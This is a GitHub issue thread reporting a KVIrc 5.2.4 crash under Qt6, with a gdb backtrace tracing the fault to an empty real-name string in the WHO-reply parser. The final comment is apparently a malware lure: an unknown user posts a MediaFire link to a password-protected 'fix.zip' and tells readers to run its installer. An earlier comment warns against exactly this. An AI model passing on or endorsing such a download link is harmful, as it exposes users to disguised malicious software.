### ISSUE TITLE
Crash with an assert on Qt6

### ISSUE THREAD

**Issue by wRAR** [kvirc/KVIrc#2673]
I've built 5.2.4 with Qt6 and it crashes some time after the start, probably when parsing some data from the server. It prints `ASSERT: "i >= 0 && i < size()" in file /usr/include/x86_64-linux-gnu/qt6/QtCore/qstring.h, line 1192`

gdb backtrace:

```c++
#4  0x00007fffeb0d56c2 in qAbort () at ./src/corelib/global/qglobal.cpp:161
#5  0x00007fffeb1225d0 in qt_message_fatal<QString&> (context=..., message=...) at ./src/corelib/global/qlogging.cpp:2003
#6  qt_message(QtMsgType, const QMessageLogContext &, const char *, typedef __va_list_tag __va_list_tag *) (msgType=msgType@entry=QtFatalMsg, context=..., msg=msg@entry=0x7fffeb3ec498 "ASSERT: \"%s\" in file %s, line %d",
    ap=ap@entry=0x7fffffffcfc0) at ./src/corelib/global/qlogging.cpp:378
#7  0x00007fffeb0d61d9 in QMessageLogger::fatal (this=this@entry=0x7fffffffd0a8, msg=msg@entry=0x7fffeb3ec498 "ASSERT: \"%s\" in file %s, line %d") at ./src/corelib/global/qlogging.cpp:901
#8  0x00007fffeb0d6235 in qt_assert (assertion=assertion@entry=0x5555558c6a4f "i >= 0 && i < size()", file=file@entry=0x5555558d3850 "/usr/include/x86_64-linux-gnu/qt6/QtCore/qstring.h", line=line@entry=1192)
    at ./src/corelib/global/qassert.cpp:68
#9  0x000055555565bbeb in QString::operator[] (i=0, this=0x7fffffffd240) at /usr/include/x86_64-linux-gnu/qt6/QtCore/qstring.h:1192
#10 0x000055555565e3a7 in QString::operator[] (this=<optimized out>, i=<optimized out>) at /usr/include/x86_64-linux-gnu/qt6/QtCore/qbytearray.h:521
#11 KviIrcServerParser::parseNumericWhoReply (this=<optimized out>, msg=0x7fffffffd450) at ./src/kvirc/sparser/KviIrcServerParser_numericHandlers.cpp:948
#12 0x000055555579ad9f in KviIrcServerParser::parseMessage (this=0x555555ee61f0, message=message@entry=0x5555568f1a20 ":coulomb.oftc.net 352 wRAR #debconf ~vimer 0002e67d.user.oftc.net coherence.oftc.net vimer H :4  ",
    pConnection=0x555556160090) at ./src/kvirc/sparser/KviIrcServerParser.cpp:74
#13 0x000055555587c976 in KviIrcConnection::incomingMessage (this=<optimized out>, pcMessage=pcMessage@entry=0x5555568f1a20 ":coulomb.oftc.net 352 wRAR #debconf ~vimer 0002e67d.user.oftc.net coherence.oftc.net vimer H :4  ")
    at ./src/kvirc/kernel/KviIrcConnection.cpp:1937
```

In the frame 11 (`KviIrcServerParser::parseNumericWhoReply`) `szReal` is apparently an empty string.

Qt 6.6.2, KF 6.5.0, Debian unstable

**Comment by Ionic** [comment]
It should go without saying that downloading and running binaries from an unknown source posted by a user that has never been seen before is a terrible idea.

Just don't.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
